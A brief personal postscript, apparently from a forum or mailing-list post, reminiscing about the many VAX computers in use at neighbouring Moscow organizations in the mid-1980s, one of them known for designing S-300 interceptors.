P.S. Incidentally, a few years later I participated in a project at another organization, unrelated to the first one but located right across the street, which used multiple 780's and 750's, and also some higher-performance equipment. One metro station down the street there was yet another organization, well known among other things for designing the S-300 missile interceptors. I never went there myself, but some of my groupmates had worked there and told various funny stories; VAXes never came up in those conversations, but I am pretty sure there must have been a good number of VAXes there as well -- probably making this particular spot the one with the highest number of VAXes per square foot in all of mid-80's Moscow. ;-)

- Sergey